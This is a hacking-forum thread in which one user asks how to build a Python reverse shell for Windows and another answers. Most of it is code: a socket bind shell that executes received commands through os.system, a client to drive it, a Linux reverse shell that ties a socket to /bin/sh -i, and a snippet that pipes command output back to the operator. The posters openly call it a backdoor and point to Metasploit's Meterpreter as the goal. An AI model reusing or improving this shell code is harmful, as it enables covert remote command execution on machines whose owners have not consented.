Python Windows Reverse shell...

[$Clone]

Hey can someone tell me if this is the write way to do a reverse shell in python     I tried it in the script below
https://evilzone.org/scripting-languages/python-virus-102/

Reverse Shell Script:

Code: (Python) [Select]


import socket
import os

def BackConnect():
    '''Executing remote commands via "backdoor"...never mind!'''
    command=""
    s=socket.socket()
    port=4444
    host=socket.gethostname()
    s.bind((host,port))
    s.listen(10)
    while True:
        ip,addr=s.accept()
        ip.send("Connected to localhost:")
        while command!="quit":
            ip.send("Enter Command:\t 'quit' to stop")
            command=ip.recv(2222)
            res=os.system(command)
            if res==0 and command!="quit":
                ip.send("Command executed successfuly!")
            elif res==1 and command=="quit":
                ip.send("Disconnecting....Goodbye!")
            else:
                ip.send("Command error!")
        s.close() 

BackConnect()


Client script is:

Code: (Python) [Select]


#This is client.py file

import socket               # Import socket module

s = socket.socket()         # Create a socket object
host = socket.gethostname() # Get local machine name
port = 4444                 #Reserve a port for your service.

if s.connect_ex((host, port))==0:
    print s.recv(1024)
    while True:
        print s.recv(3456)
        command=raw_input("Enter command:")
        s.send(command)
        print"-----------------------------------"
        print s.recv(1234)
        print"-----------------------------------"
   
s.close()                     # Close the socket when done


Linux is quite easy one can use netcat,shell script or a reverse script python..perl .ruby...lua... etc.. etc...

Code: (Python) [Select]


import socket
impot subprocess
import os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
port=4444
host=socket.gethostname()
s.connect((host,port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

not real...but something like that  .

In windows.....how can i send the command results data back to me i know of PsTools but how can we implement in python for windows.Metasploit does this very well.

 

[DeXtreme]

Well i don't think it's much of a shell if you don't receive any output from the command you execute. Try something like this instead;

Code: (Python) [Select]

#recieve command
            cmd=con.recv(1024)
 
            #execute command
            proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,\
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            out,err=proc.communicate()
 
            #send output
            con.send(out+err)

subprocess.Popen returns the result of the command executed. Check out https://evilzone.org/projects-and-discussion/project-shebang/15/ for the full code.

[$Clone]

Thanx alot but what if i enter the command "cd directory"...i think it hangs...

[DeXtreme]

It opens a new process each time,executes the command and terminates the process so it doesn't keep track of directories you've cd'ed into. You might have to code that feature yourself or "ls" alot.

[$Clone]

I see...but i theoretically thought if one could create an instance of cmd then this would be much better but i guess will have to figure that out......but how does metasploit do it with  and stuff...
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics

between what prog lang are you specialized in.......if you don't mind me asking